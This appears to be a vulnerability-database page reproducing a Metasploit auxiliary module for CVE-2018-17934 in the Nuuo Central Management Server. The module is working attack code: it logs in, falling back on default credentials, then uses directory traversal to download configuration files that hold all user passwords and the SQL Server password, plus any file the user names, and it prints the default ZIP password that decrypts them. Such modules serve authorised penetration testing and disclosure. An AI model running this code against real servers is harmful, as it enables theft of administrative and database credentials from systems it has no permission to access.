Lucene search
K

Nuuo Central Management Server Authenticated Arbitrary File Download

🗓️ 21 Jan 2019 10:17:36Reported by Pedro Ribeiro <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 62 Views

Nuuo Central Management Server Authenticated File Download With Directory Traversal Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
Nuuo Central Management Server Authenticated Arbitrary File Download
27 Nov 201800:00
attackerkb
Circl
CVE-2018-17934
20 Feb 201913:16
circl
CNVD
NUUO CMS Code Execution Vulnerability (CNVD-2018-24250)
29 Nov 201800:00
cnvd
CVE
CVE-2018-17934
27 Nov 201821:00
cve
Cvelist
CVE-2018-17934
27 Nov 201821:00
cvelist
ICS
NUUO CMS (Update A)
11 Oct 201800:00
ics
NVD
CVE-2018-17934
27 Nov 201820:29
nvd
OSV
CVE-2018-17934
27 Nov 201820:29
osv
Packet Storm
Nuuo Central Management Server Authenticated Arbitrary File Download
31 Aug 202400:00
packetstorm
Prion
Code injection
27 Nov 201820:29
prion
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::Nuuo
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Nuuo Central Management Server Authenticated Arbitrary File Download',
      'Description'    => %q{
      The Nuuo Central Management Server allows an authenticated user to download files from the
      installation folder. This functionality can be abused to obtain administrative credentials,
      the SQL Server database password and arbitrary files off the system with directory traversal.
      The module will attempt to download CMServer.cfg (the user configuration file with all the user
      passwords including the admin one), ServerConfig.cfg (the server configuration file with the
      SQL Server password) and a third file if the FILE argument is provided by the user.
      The two .cfg files are zip-encrypted files, but due to limitations of the Ruby ZIP modules
      included in Metasploit, these files cannot be decrypted programmatically. The user will
      have to open them with zip or a similar program and provide the default password "NUCMS2007!".
      This module will either use a provided session number (which can be guessed with an auxiliary
      module) or attempt to login using a provided username and password - it will also try the
      default credentials if nothing is provided.
      All versions of CMS server up to and including 3.5 are vulnerable to this attack.
      },
      'Author'         =>
        [
          'Pedro Ribeiro <[email protected]>'         # Vulnerability discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2018-17934' ],
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-18-284-02' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/NUUO/nuuo-cms-ownage.txt' ]

        ],
      'Platform'        => ['win'],
      'Privileged'      => true,
      'DisclosureDate'  => '2018-10-11'))

    register_options(
      [
        OptInt.new('DEPTH', [true, 'Directory traversal depth [..\]', 2]),
        OptString.new('FILE', [false, 'Additional file to download'])
      ])
  end

  def download_file(file_name, ctype='application/zip', depth=2)
    res = ncs_send_request({
      'method'        => 'GETCONFIG',
      'user_session'  => user_session,
      'file_name'     => %{#{"..\\"*depth}#{file_name}}
    })

    return nil unless res
    path = store_loot(file_name, ctype, datastore['RHOST'],
                      res.body, file_name, "Nuuo CMS #{file_name} downloaded")
    print_good("Downloaded file to #{path}")
  end

  def run
    connect
    res = ncs_login

    unless res
      fail_with(Failure::NoAccess, "Failed to login to Nuuo CMS")
    end

    download_file('CMServer.cfg')
    download_file('ServerConfig.cfg')

    info = %q{
    The user and server configuration files were stored in the loot database.
    The files are ZIP encrypted, and due to the lack of the archive/zip gem,
    they cannot be decrypted in Metasploit.
    You will need to open them up with zip or a similar utility, and use the
    password NUCMS2007! to unzip them.
    Annoy the Metasploit developers until this gets fixed!
    }
    print_status("\r\n#{info}")

    if datastore['FILE']
      download_file(datastore['FILE'], 'application/octet-stream', datastore['DEPTH'])
    end

    client.close
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation